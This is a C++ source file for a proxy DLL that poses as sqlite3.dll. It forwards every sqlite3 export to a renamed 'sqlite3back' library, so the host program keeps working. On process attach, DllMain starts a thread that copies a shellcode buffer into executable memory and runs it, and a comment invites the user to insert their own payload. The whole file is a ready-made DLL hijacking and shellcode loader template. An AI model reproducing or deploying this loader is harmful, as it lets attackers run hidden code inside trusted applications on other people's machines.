// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#pragma comment(linker, "/EXPORT:sqlite3_aggregate_context=sqlite3back.sqlite3_aggregate_context")
#pragma comment(linker, "/EXPORT:sqlite3_aggregate_count=sqlite3back.sqlite3_aggregate_count")
#pragma comment(linker, "/EXPORT:sqlite3_auto_extension=sqlite3back.sqlite3_auto_extension")
#pragma comment(linker, "/EXPORT:sqlite3_backup_finish=sqlite3back.sqlite3_backup_finish")
#pragma comment(linker, "/EXPORT:sqlite3_backup_init=sqlite3back.sqlite3_backup_init")
#pragma comment(linker, "/EXPORT:sqlite3_backup_pagecount=sqlite3back.sqlite3_backup_pagecount")
#pragma comment(linker, "/EXPORT:sqlite3_backup_remaining=sqlite3back.sqlite3_backup_remaining")
#pragma comment(linker, "/EXPORT:sqlite3_backup_step=sqlite3back.sqlite3_backup_step")
#pragma comment(linker, "/EXPORT:sqlite3_bind_blob=sqlite3back.sqlite3_bind_blob")
#pragma comment(linker, "/EXPORT:sqlite3_bind_blob64=sqlite3back.sqlite3_bind_blob64")
#pragma comment(linker, "/EXPORT:sqlite3_bind_double=sqlite3back.sqlite3_bind_double")
#pragma comment(linker, "/EXPORT:sqlite3_bind_int=sqlite3back.sqlite3_bind_int")
#pragma comment(linker, "/EXPORT:sqlite3_bind_int64=sqlite3back.sqlite3_bind_int64")
#pragma comment(linker, "/EXPORT:sqlite3_bind_null=sqlite3back.sqlite3_bind_null")
#pragma comment(linker, "/EXPORT:sqlite3_bind_parameter_count=sqlite3back.sqlite3_bind_parameter_count")
#pragma comment(linker, "/EXPORT:sqlite3_bind_parameter_index=sqlite3back.sqlite3_bind_parameter_index")
#pragma comment(linker, "/EXPORT:sqlite3_bind_parameter_name=sqlite3back.sqlite3_bind_parameter_name")
#pragma comment(linker, "/EXPORT:sqlite3_bind_pointer=sqlite3back.sqlite3_bind_pointer")
#pragma comment(linker, "/EXPORT:sqlite3_bind_text=sqlite3back.sqlite3_bind_text")
#pragma comment(linker, "/EXPORT:sqlite3_bind_text16=sqlite3back.sqlite3_bind_text16")
#pragma comment(linker, "/EXPORT:sqlite3_bind_text64=sqlite3back.sqlite3_bind_text64")
#pragma comment(linker, "/EXPORT:sqlite3_bind_value=sqlite3back.sqlite3_bind_value")
#pragma comment(linker, "/EXPORT:sqlite3_bind_zeroblob=sqlite3back.sqlite3_bind_zeroblob")
#pragma comment(linker, "/EXPORT:sqlite3_bind_zeroblob64=sqlite3back.sqlite3_bind_zeroblob64")
#pragma comment(linker, "/EXPORT:sqlite3_blob_bytes=sqlite3back.sqlite3_blob_bytes")
#pragma comment(linker, "/EXPORT:sqlite3_blob_close=sqlite3back.sqlite3_blob_close")
#pragma comment(linker, "/EXPORT:sqlite3_blob_open=sqlite3back.sqlite3_blob_open")
#pragma comment(linker, "/EXPORT:sqlite3_blob_read=sqlite3back.sqlite3_blob_read")
#pragma comment(linker, "/EXPORT:sqlite3_blob_reopen=sqlite3back.sqlite3_blob_reopen")
#pragma comment(linker, "/EXPORT:sqlite3_blob_write=sqlite3back.sqlite3_blob_write")
#pragma comment(linker, "/EXPORT:sqlite3_busy_handler=sqlite3back.sqlite3_busy_handler")
#pragma comment(linker, "/EXPORT:sqlite3_busy_timeout=sqlite3back.sqlite3_busy_timeout")
#pragma comment(linker, "/EXPORT:sqlite3_cancel_auto_extension=sqlite3back.sqlite3_cancel_auto_extension")
#pragma comment(linker, "/EXPORT:sqlite3_changes=sqlite3back.sqlite3_changes")
#pragma comment(linker, "/EXPORT:sqlite3_clear_bindings=sqlite3back.sqlite3_clear_bindings")
#pragma comment(linker, "/EXPORT:sqlite3_close=sqlite3back.sqlite3_close")
#pragma comment(linker, "/EXPORT:sqlite3_close_v2=sqlite3back.sqlite3_close_v2")
#pragma comment(linker, "/EXPORT:sqlite3_collation_needed=sqlite3back.sqlite3_collation_needed")
#pragma comment(linker, "/EXPORT:sqlite3_collation_needed16=sqlite3back.sqlite3_collation_needed16")
#pragma comment(linker, "/EXPORT:sqlite3_column_blob=sqlite3back.sqlite3_column_blob")
#pragma comment(linker, "/EXPORT:sqlite3_column_bytes=sqlite3back.sqlite3_column_bytes")
#pragma comment(linker, "/EXPORT:sqlite3_column_bytes16=sqlite3back.sqlite3_column_bytes16")
#pragma comment(linker, "/EXPORT:sqlite3_column_count=sqlite3back.sqlite3_column_count")
#pragma comment(linker, "/EXPORT:sqlite3_column_database_name=sqlite3back.sqlite3_column_database_name")
#pragma comment(linker, "/EXPORT:sqlite3_column_database_name16=sqlite3back.sqlite3_column_database_name16")
#pragma comment(linker, "/EXPORT:sqlite3_column_decltype=sqlite3back.sqlite3_column_decltype")
#pragma comment(linker, "/EXPORT:sqlite3_column_decltype16=sqlite3back.sqlite3_column_decltype16")
#pragma comment(linker, "/EXPORT:sqlite3_column_double=sqlite3back.sqlite3_column_double")
#pragma comment(linker, "/EXPORT:sqlite3_column_int=sqlite3back.sqlite3_column_int")
#pragma comment(linker, "/EXPORT:sqlite3_column_int64=sqlite3back.sqlite3_column_int64")
#pragma comment(linker, "/EXPORT:sqlite3_column_name=sqlite3back.sqlite3_column_name")
#pragma comment(linker, "/EXPORT:sqlite3_column_name16=sqlite3back.sqlite3_column_name16")
#pragma comment(linker, "/EXPORT:sqlite3_column_origin_name=sqlite3back.sqlite3_column_origin_name")
#pragma comment(linker, "/EXPORT:sqlite3_column_origin_name16=sqlite3back.sqlite3_column_origin_name16")
#pragma comment(linker, "/EXPORT:sqlite3_column_table_name=sqlite3back.sqlite3_column_table_name")
#pragma comment(linker, "/EXPORT:sqlite3_column_table_name16=sqlite3back.sqlite3_column_table_name16")
#pragma comment(linker, "/EXPORT:sqlite3_column_text=sqlite3back.sqlite3_column_text")
#pragma comment(linker, "/EXPORT:sqlite3_column_text16=sqlite3back.sqlite3_column_text16")
#pragma comment(linker, "/EXPORT:sqlite3_column_type=sqlite3back.sqlite3_column_type")
#pragma comment(linker, "/EXPORT:sqlite3_column_value=sqlite3back.sqlite3_column_value")
#pragma comment(linker, "/EXPORT:sqlite3_commit_hook=sqlite3back.sqlite3_commit_hook")
#pragma comment(linker, "/EXPORT:sqlite3_compileoption_get=sqlite3back.sqlite3_compileoption_get")
#pragma comment(linker, "/EXPORT:sqlite3_compileoption_used=sqlite3back.sqlite3_compileoption_used")
#pragma comment(linker, "/EXPORT:sqlite3_complete=sqlite3back.sqlite3_complete")
#pragma comment(linker, "/EXPORT:sqlite3_complete16=sqlite3back.sqlite3_complete16")
#pragma comment(linker, "/EXPORT:sqlite3_config=sqlite3back.sqlite3_config")
#pragma comment(linker, "/EXPORT:sqlite3_context_db_handle=sqlite3back.sqlite3_context_db_handle")
#pragma comment(linker, "/EXPORT:sqlite3_create_collation=sqlite3back.sqlite3_create_collation")
#pragma comment(linker, "/EXPORT:sqlite3_create_collation16=sqlite3back.sqlite3_create_collation16")
#pragma comment(linker, "/EXPORT:sqlite3_create_collation_v2=sqlite3back.sqlite3_create_collation_v2")
#pragma comment(linker, "/EXPORT:sqlite3_create_function=sqlite3back.sqlite3_create_function")
#pragma comment(linker, "/EXPORT:sqlite3_create_function16=sqlite3back.sqlite3_create_function16")
#pragma comment(linker, "/EXPORT:sqlite3_create_function_v2=sqlite3back.sqlite3_create_function_v2")
#pragma comment(linker, "/EXPORT:sqlite3_create_module=sqlite3back.sqlite3_create_module")
#pragma comment(linker, "/EXPORT:sqlite3_create_module_v2=sqlite3back.sqlite3_create_module_v2")
#pragma comment(linker, "/EXPORT:sqlite3_create_window_function=sqlite3back.sqlite3_create_window_function")
#pragma comment(linker, "/EXPORT:sqlite3_data_count=sqlite3back.sqlite3_data_count")
#pragma comment(linker, "/EXPORT:sqlite3_data_directory=sqlite3back.sqlite3_data_directory")
#pragma comment(linker, "/EXPORT:sqlite3_db_cacheflush=sqlite3back.sqlite3_db_cacheflush")
#pragma comment(linker, "/EXPORT:sqlite3_db_config=sqlite3back.sqlite3_db_config")
#pragma comment(linker, "/EXPORT:sqlite3_db_filename=sqlite3back.sqlite3_db_filename")
#pragma comment(linker, "/EXPORT:sqlite3_db_handle=sqlite3back.sqlite3_db_handle")
#pragma comment(linker, "/EXPORT:sqlite3_db_mutex=sqlite3back.sqlite3_db_mutex")
#pragma comment(linker, "/EXPORT:sqlite3_db_readonly=sqlite3back.sqlite3_db_readonly")
#pragma comment(linker, "/EXPORT:sqlite3_db_release_memory=sqlite3back.sqlite3_db_release_memory")
#pragma comment(linker, "/EXPORT:sqlite3_db_status=sqlite3back.sqlite3_db_status")
#pragma comment(linker, "/EXPORT:sqlite3_declare_vtab=sqlite3back.sqlite3_declare_vtab")
#pragma comment(linker, "/EXPORT:sqlite3_enable_load_extension=sqlite3back.sqlite3_enable_load_extension")
#pragma comment(linker, "/EXPORT:sqlite3_enable_shared_cache=sqlite3back.sqlite3_enable_shared_cache")
#pragma comment(linker, "/EXPORT:sqlite3_errcode=sqlite3back.sqlite3_errcode")
#pragma comment(linker, "/EXPORT:sqlite3_errmsg=sqlite3back.sqlite3_errmsg")
#pragma comment(linker, "/EXPORT:sqlite3_errmsg16=sqlite3back.sqlite3_errmsg16")
#pragma comment(linker, "/EXPORT:sqlite3_errstr=sqlite3back.sqlite3_errstr")
#pragma comment(linker, "/EXPORT:sqlite3_exec=sqlite3back.sqlite3_exec")
#pragma comment(linker, "/EXPORT:sqlite3_expanded_sql=sqlite3back.sqlite3_expanded_sql")
#pragma comment(linker, "/EXPORT:sqlite3_expired=sqlite3back.sqlite3_expired")
#pragma comment(linker, "/EXPORT:sqlite3_extended_errcode=sqlite3back.sqlite3_extended_errcode")
#pragma comment(linker, "/EXPORT:sqlite3_extended_result_codes=sqlite3back.sqlite3_extended_result_codes")
#pragma comment(linker, "/EXPORT:sqlite3_file_control=sqlite3back.sqlite3_file_control")
#pragma comment(linker, "/EXPORT:sqlite3_finalize=sqlite3back.sqlite3_finalize")
#pragma comment(linker, "/EXPORT:sqlite3_free=sqlite3back.sqlite3_free")
#pragma comment(linker, "/EXPORT:sqlite3_free_table=sqlite3back.sqlite3_free_table")
#pragma comment(linker, "/EXPORT:sqlite3_fts5_may_be_corrupt=sqlite3back.sqlite3_fts5_may_be_corrupt")
#pragma comment(linker, "/EXPORT:sqlite3_get_autocommit=sqlite3back.sqlite3_get_autocommit")
#pragma comment(linker, "/EXPORT:sqlite3_get_auxdata=sqlite3back.sqlite3_get_auxdata")
#pragma comment(linker, "/EXPORT:sqlite3_get_table=sqlite3back.sqlite3_get_table")
#pragma comment(linker, "/EXPORT:sqlite3_global_recover=sqlite3back.sqlite3_global_recover")
#pragma comment(linker, "/EXPORT:sqlite3_initialize=sqlite3back.sqlite3_initialize")
#pragma comment(linker, "/EXPORT:sqlite3_interrupt=sqlite3back.sqlite3_interrupt")
#pragma comment(linker, "/EXPORT:sqlite3_keyword_check=sqlite3back.sqlite3_keyword_check")
#pragma comment(linker, "/EXPORT:sqlite3_keyword_count=sqlite3back.sqlite3_keyword_count")
#pragma comment(linker, "/EXPORT:sqlite3_keyword_name=sqlite3back.sqlite3_keyword_name")
#pragma comment(linker, "/EXPORT:sqlite3_last_insert_rowid=sqlite3back.sqlite3_last_insert_rowid")
#pragma comment(linker, "/EXPORT:sqlite3_libversion=sqlite3back.sqlite3_libversion")
#pragma comment(linker, "/EXPORT:sqlite3_libversion_number=sqlite3back.sqlite3_libversion_number")
#pragma comment(linker, "/EXPORT:sqlite3_limit=sqlite3back.sqlite3_limit")
#pragma comment(linker, "/EXPORT:sqlite3_load_extension=sqlite3back.sqlite3_load_extension")
#pragma comment(linker, "/EXPORT:sqlite3_log=sqlite3back.sqlite3_log")
#pragma comment(linker, "/EXPORT:sqlite3_malloc=sqlite3back.sqlite3_malloc")
#pragma comment(linker, "/EXPORT:sqlite3_malloc64=sqlite3back.sqlite3_malloc64")
#pragma comment(linker, "/EXPORT:sqlite3_memory_alarm=sqlite3back.sqlite3_memory_alarm")
#pragma comment(linker, "/EXPORT:sqlite3_memory_highwater=sqlite3back.sqlite3_memory_highwater")
#pragma comment(linker, "/EXPORT:sqlite3_memory_used=sqlite3back.sqlite3_memory_used")
#pragma comment(linker, "/EXPORT:sqlite3_mprintf=sqlite3back.sqlite3_mprintf")
#pragma comment(linker, "/EXPORT:sqlite3_msize=sqlite3back.sqlite3_msize")
#pragma comment(linker, "/EXPORT:sqlite3_mutex_alloc=sqlite3back.sqlite3_mutex_alloc")
#pragma comment(linker, "/EXPORT:sqlite3_mutex_enter=sqlite3back.sqlite3_mutex_enter")
#pragma comment(linker, "/EXPORT:sqlite3_mutex_free=sqlite3back.sqlite3_mutex_free")
#pragma comment(linker, "/EXPORT:sqlite3_mutex_leave=sqlite3back.sqlite3_mutex_leave")
#pragma comment(linker, "/EXPORT:sqlite3_mutex_try=sqlite3back.sqlite3_mutex_try")
#pragma comment(linker, "/EXPORT:sqlite3_next_stmt=sqlite3back.sqlite3_next_stmt")
#pragma comment(linker, "/EXPORT:sqlite3_open=sqlite3back.sqlite3_open")
#pragma comment(linker, "/EXPORT:sqlite3_open16=sqlite3back.sqlite3_open16")
#pragma comment(linker, "/EXPORT:sqlite3_open_v2=sqlite3back.sqlite3_open_v2")
#pragma comment(linker, "/EXPORT:sqlite3_os_end=sqlite3back.sqlite3_os_end")
#pragma comment(linker, "/EXPORT:sqlite3_os_init=sqlite3back.sqlite3_os_init")
#pragma comment(linker, "/EXPORT:sqlite3_overload_function=sqlite3back.sqlite3_overload_function")
#pragma comment(linker, "/EXPORT:sqlite3_prepare=sqlite3back.sqlite3_prepare")
#pragma comment(linker, "/EXPORT:sqlite3_prepare16=sqlite3back.sqlite3_prepare16")
#pragma comment(linker, "/EXPORT:sqlite3_prepare16_v2=sqlite3back.sqlite3_prepare16_v2")
#pragma comment(linker, "/EXPORT:sqlite3_prepare16_v3=sqlite3back.sqlite3_prepare16_v3")
#pragma comment(linker, "/EXPORT:sqlite3_prepare_v2=sqlite3back.sqlite3_prepare_v2")
#pragma comment(linker, "/EXPORT:sqlite3_prepare_v3=sqlite3back.sqlite3_prepare_v3")
#pragma comment(linker, "/EXPORT:sqlite3_profile=sqlite3back.sqlite3_profile")
#pragma comment(linker, "/EXPORT:sqlite3_progress_handler=sqlite3back.sqlite3_progress_handler")
#pragma comment(linker, "/EXPORT:sqlite3_randomness=sqlite3back.sqlite3_randomness")
#pragma comment(linker, "/EXPORT:sqlite3_realloc=sqlite3back.sqlite3_realloc")
#pragma comment(linker, "/EXPORT:sqlite3_realloc64=sqlite3back.sqlite3_realloc64")
#pragma comment(linker, "/EXPORT:sqlite3_release_memory=sqlite3back.sqlite3_release_memory")
#pragma comment(linker, "/EXPORT:sqlite3_reset=sqlite3back.sqlite3_reset")
#pragma comment(linker, "/EXPORT:sqlite3_reset_auto_extension=sqlite3back.sqlite3_reset_auto_extension")
#pragma comment(linker, "/EXPORT:sqlite3_result_blob=sqlite3back.sqlite3_result_blob")
#pragma comment(linker, "/EXPORT:sqlite3_result_blob64=sqlite3back.sqlite3_result_blob64")
#pragma comment(linker, "/EXPORT:sqlite3_result_double=sqlite3back.sqlite3_result_double")
#pragma comment(linker, "/EXPORT:sqlite3_result_error=sqlite3back.sqlite3_result_error")
#pragma comment(linker, "/EXPORT:sqlite3_result_error16=sqlite3back.sqlite3_result_error16")
#pragma comment(linker, "/EXPORT:sqlite3_result_error_code=sqlite3back.sqlite3_result_error_code")
#pragma comment(linker, "/EXPORT:sqlite3_result_error_nomem=sqlite3back.sqlite3_result_error_nomem")
#pragma comment(linker, "/EXPORT:sqlite3_result_error_toobig=sqlite3back.sqlite3_result_error_toobig")
#pragma comment(linker, "/EXPORT:sqlite3_result_int=sqlite3back.sqlite3_result_int")
#pragma comment(linker, "/EXPORT:sqlite3_result_int64=sqlite3back.sqlite3_result_int64")
#pragma comment(linker, "/EXPORT:sqlite3_result_null=sqlite3back.sqlite3_result_null")
#pragma comment(linker, "/EXPORT:sqlite3_result_pointer=sqlite3back.sqlite3_result_pointer")
#pragma comment(linker, "/EXPORT:sqlite3_result_subtype=sqlite3back.sqlite3_result_subtype")
#pragma comment(linker, "/EXPORT:sqlite3_result_text=sqlite3back.sqlite3_result_text")
#pragma comment(linker, "/EXPORT:sqlite3_result_text16=sqlite3back.sqlite3_result_text16")
#pragma comment(linker, "/EXPORT:sqlite3_result_text16be=sqlite3back.sqlite3_result_text16be")
#pragma comment(linker, "/EXPORT:sqlite3_result_text16le=sqlite3back.sqlite3_result_text16le")
#pragma comment(linker, "/EXPORT:sqlite3_result_text64=sqlite3back.sqlite3_result_text64")
#pragma comment(linker, "/EXPORT:sqlite3_result_value=sqlite3back.sqlite3_result_value")
#pragma comment(linker, "/EXPORT:sqlite3_result_zeroblob=sqlite3back.sqlite3_result_zeroblob")
#pragma comment(linker, "/EXPORT:sqlite3_result_zeroblob64=sqlite3back.sqlite3_result_zeroblob64")
#pragma comment(linker, "/EXPORT:sqlite3_rollback_hook=sqlite3back.sqlite3_rollback_hook")
#pragma comment(linker, "/EXPORT:sqlite3_rtree_geometry_callback=sqlite3back.sqlite3_rtree_geometry_callback")
#pragma comment(linker, "/EXPORT:sqlite3_rtree_query_callback=sqlite3back.sqlite3_rtree_query_callback")
#pragma comment(linker, "/EXPORT:sqlite3_set_authorizer=sqlite3back.sqlite3_set_authorizer")
#pragma comment(linker, "/EXPORT:sqlite3_set_auxdata=sqlite3back.sqlite3_set_auxdata")
#pragma comment(linker, "/EXPORT:sqlite3_set_last_insert_rowid=sqlite3back.sqlite3_set_last_insert_rowid")
#pragma comment(linker, "/EXPORT:sqlite3_shutdown=sqlite3back.sqlite3_shutdown")
#pragma comment(linker, "/EXPORT:sqlite3_sleep=sqlite3back.sqlite3_sleep")
#pragma comment(linker, "/EXPORT:sqlite3_snprintf=sqlite3back.sqlite3_snprintf")
#pragma comment(linker, "/EXPORT:sqlite3_soft_heap_limit=sqlite3back.sqlite3_soft_heap_limit")
#pragma comment(linker, "/EXPORT:sqlite3_soft_heap_limit64=sqlite3back.sqlite3_soft_heap_limit64")
#pragma comment(linker, "/EXPORT:sqlite3_sourceid=sqlite3back.sqlite3_sourceid")
#pragma comment(linker, "/EXPORT:sqlite3_sql=sqlite3back.sqlite3_sql")
#pragma comment(linker, "/EXPORT:sqlite3_status=sqlite3back.sqlite3_status")
#pragma comment(linker, "/EXPORT:sqlite3_status64=sqlite3back.sqlite3_status64")
#pragma comment(linker, "/EXPORT:sqlite3_step=sqlite3back.sqlite3_step")
#pragma comment(linker, "/EXPORT:sqlite3_stmt_busy=sqlite3back.sqlite3_stmt_busy")
#pragma comment(linker, "/EXPORT:sqlite3_stmt_readonly=sqlite3back.sqlite3_stmt_readonly")
#pragma comment(linker, "/EXPORT:sqlite3_stmt_status=sqlite3back.sqlite3_stmt_status")
#pragma comment(linker, "/EXPORT:sqlite3_strglob=sqlite3back.sqlite3_strglob")
#pragma comment(linker, "/EXPORT:sqlite3_stricmp=sqlite3back.sqlite3_stricmp")
#pragma comment(linker, "/EXPORT:sqlite3_strlike=sqlite3back.sqlite3_strlike")
#pragma comment(linker, "/EXPORT:sqlite3_strnicmp=sqlite3back.sqlite3_strnicmp")
#pragma comment(linker, "/EXPORT:sqlite3_str_append=sqlite3back.sqlite3_str_append")
#pragma comment(linker, "/EXPORT:sqlite3_str_appendall=sqlite3back.sqlite3_str_appendall")
#pragma comment(linker, "/EXPORT:sqlite3_str_appendchar=sqlite3back.sqlite3_str_appendchar")
#pragma comment(linker, "/EXPORT:sqlite3_str_appendf=sqlite3back.sqlite3_str_appendf")
#pragma comment(linker, "/EXPORT:sqlite3_str_errcode=sqlite3back.sqlite3_str_errcode")
#pragma comment(linker, "/EXPORT:sqlite3_str_finish=sqlite3back.sqlite3_str_finish")
#pragma comment(linker, "/EXPORT:sqlite3_str_length=sqlite3back.sqlite3_str_length")
#pragma comment(linker, "/EXPORT:sqlite3_str_new=sqlite3back.sqlite3_str_new")
#pragma comment(linker, "/EXPORT:sqlite3_str_reset=sqlite3back.sqlite3_str_reset")
#pragma comment(linker, "/EXPORT:sqlite3_str_value=sqlite3back.sqlite3_str_value")
#pragma comment(linker, "/EXPORT:sqlite3_str_vappendf=sqlite3back.sqlite3_str_vappendf")
#pragma comment(linker, "/EXPORT:sqlite3_system_errno=sqlite3back.sqlite3_system_errno")
#pragma comment(linker, "/EXPORT:sqlite3_table_column_metadata=sqlite3back.sqlite3_table_column_metadata")
#pragma comment(linker, "/EXPORT:sqlite3_temp_directory=sqlite3back.sqlite3_temp_directory")
#pragma comment(linker, "/EXPORT:sqlite3_test_control=sqlite3back.sqlite3_test_control")
#pragma comment(linker, "/EXPORT:sqlite3_threadsafe=sqlite3back.sqlite3_threadsafe")
#pragma comment(linker, "/EXPORT:sqlite3_thread_cleanup=sqlite3back.sqlite3_thread_cleanup")
#pragma comment(linker, "/EXPORT:sqlite3_total_changes=sqlite3back.sqlite3_total_changes")
#pragma comment(linker, "/EXPORT:sqlite3_trace=sqlite3back.sqlite3_trace")
#pragma comment(linker, "/EXPORT:sqlite3_trace_v2=sqlite3back.sqlite3_trace_v2")
#pragma comment(linker, "/EXPORT:sqlite3_transfer_bindings=sqlite3back.sqlite3_transfer_bindings")
#pragma comment(linker, "/EXPORT:sqlite3_update_hook=sqlite3back.sqlite3_update_hook")
#pragma comment(linker, "/EXPORT:sqlite3_uri_boolean=sqlite3back.sqlite3_uri_boolean")
#pragma comment(linker, "/EXPORT:sqlite3_uri_int64=sqlite3back.sqlite3_uri_int64")
#pragma comment(linker, "/EXPORT:sqlite3_uri_parameter=sqlite3back.sqlite3_uri_parameter")
#pragma comment(linker, "/EXPORT:sqlite3_user_data=sqlite3back.sqlite3_user_data")
#pragma comment(linker, "/EXPORT:sqlite3_value_blob=sqlite3back.sqlite3_value_blob")
#pragma comment(linker, "/EXPORT:sqlite3_value_bytes=sqlite3back.sqlite3_value_bytes")
#pragma comment(linker, "/EXPORT:sqlite3_value_bytes16=sqlite3back.sqlite3_value_bytes16")
#pragma comment(linker, "/EXPORT:sqlite3_value_double=sqlite3back.sqlite3_value_double")
#pragma comment(linker, "/EXPORT:sqlite3_value_dup=sqlite3back.sqlite3_value_dup")
#pragma comment(linker, "/EXPORT:sqlite3_value_free=sqlite3back.sqlite3_value_free")
#pragma comment(linker, "/EXPORT:sqlite3_value_int=sqlite3back.sqlite3_value_int")
#pragma comment(linker, "/EXPORT:sqlite3_value_int64=sqlite3back.sqlite3_value_int64")
#pragma comment(linker, "/EXPORT:sqlite3_value_nochange=sqlite3back.sqlite3_value_nochange")
#pragma comment(linker, "/EXPORT:sqlite3_value_numeric_type=sqlite3back.sqlite3_value_numeric_type")
#pragma comment(linker, "/EXPORT:sqlite3_value_pointer=sqlite3back.sqlite3_value_pointer")
#pragma comment(linker, "/EXPORT:sqlite3_value_subtype=sqlite3back.sqlite3_value_subtype")
#pragma comment(linker, "/EXPORT:sqlite3_value_text=sqlite3back.sqlite3_value_text")
#pragma comment(linker, "/EXPORT:sqlite3_value_text16=sqlite3back.sqlite3_value_text16")
#pragma comment(linker, "/EXPORT:sqlite3_value_text16be=sqlite3back.sqlite3_value_text16be")
#pragma comment(linker, "/EXPORT:sqlite3_value_text16le=sqlite3back.sqlite3_value_text16le")
#pragma comment(linker, "/EXPORT:sqlite3_value_type=sqlite3back.sqlite3_value_type")
#pragma comment(linker, "/EXPORT:sqlite3_version=sqlite3back.sqlite3_version")
#pragma comment(linker, "/EXPORT:sqlite3_vfs_find=sqlite3back.sqlite3_vfs_find")
#pragma comment(linker, "/EXPORT:sqlite3_vfs_register=sqlite3back.sqlite3_vfs_register")
#pragma comment(linker, "/EXPORT:sqlite3_vfs_unregister=sqlite3back.sqlite3_vfs_unregister")
#pragma comment(linker, "/EXPORT:sqlite3_vmprintf=sqlite3back.sqlite3_vmprintf")
#pragma comment(linker, "/EXPORT:sqlite3_vsnprintf=sqlite3back.sqlite3_vsnprintf")
#pragma comment(linker, "/EXPORT:sqlite3_vtab_collation=sqlite3back.sqlite3_vtab_collation")
#pragma comment(linker, "/EXPORT:sqlite3_vtab_config=sqlite3back.sqlite3_vtab_config")
#pragma comment(linker, "/EXPORT:sqlite3_vtab_nochange=sqlite3back.sqlite3_vtab_nochange")
#pragma comment(linker, "/EXPORT:sqlite3_vtab_on_conflict=sqlite3back.sqlite3_vtab_on_conflict")
#pragma comment(linker, "/EXPORT:sqlite3_wal_autocheckpoint=sqlite3back.sqlite3_wal_autocheckpoint")
#pragma comment(linker, "/EXPORT:sqlite3_wal_checkpoint=sqlite3back.sqlite3_wal_checkpoint")
#pragma comment(linker, "/EXPORT:sqlite3_wal_checkpoint_v2=sqlite3back.sqlite3_wal_checkpoint_v2")
#pragma comment(linker, "/EXPORT:sqlite3_wal_hook=sqlite3back.sqlite3_wal_hook")
#pragma comment(linker, "/EXPORT:sqlite3_win32_is_nt=sqlite3back.sqlite3_win32_is_nt")
#pragma comment(linker, "/EXPORT:sqlite3_win32_mbcs_to_utf8=sqlite3back.sqlite3_win32_mbcs_to_utf8")
#pragma comment(linker, "/EXPORT:sqlite3_win32_mbcs_to_utf8_v2=sqlite3back.sqlite3_win32_mbcs_to_utf8_v2")
#pragma comment(linker, "/EXPORT:sqlite3_win32_set_directory=sqlite3back.sqlite3_win32_set_directory")
#pragma comment(linker, "/EXPORT:sqlite3_win32_set_directory8=sqlite3back.sqlite3_win32_set_directory8")
#pragma comment(linker, "/EXPORT:sqlite3_win32_set_directory16=sqlite3back.sqlite3_win32_set_directory16")
#pragma comment(linker, "/EXPORT:sqlite3_win32_sleep=sqlite3back.sqlite3_win32_sleep")
#pragma comment(linker, "/EXPORT:sqlite3_win32_unicode_to_utf8=sqlite3back.sqlite3_win32_unicode_to_utf8")
#pragma comment(linker, "/EXPORT:sqlite3_win32_utf8_to_mbcs=sqlite3back.sqlite3_win32_utf8_to_mbcs")
#pragma comment(linker, "/EXPORT:sqlite3_win32_utf8_to_mbcs_v2=sqlite3back.sqlite3_win32_utf8_to_mbcs_v2")
#pragma comment(linker, "/EXPORT:sqlite3_win32_utf8_to_unicode=sqlite3back.sqlite3_win32_utf8_to_unicode")
#pragma comment(linker, "/EXPORT:sqlite3_win32_write_debug=sqlite3back.sqlite3_win32_write_debug")


DWORD WINAPI ThreadProc(LPVOID lParam) {
    /* your payload. */

    unsigned char buf[] = "";
    void* exec = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, buf, sizeof(buf));
    ((void(*) () )exec)();
    return 0;
}


BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    HANDLE hThread = NULL;
    switch (ul_reason_for_call)
    {
        
    case DLL_PROCESS_ATTACH:
        hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
        CloseHandle(hThread);
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

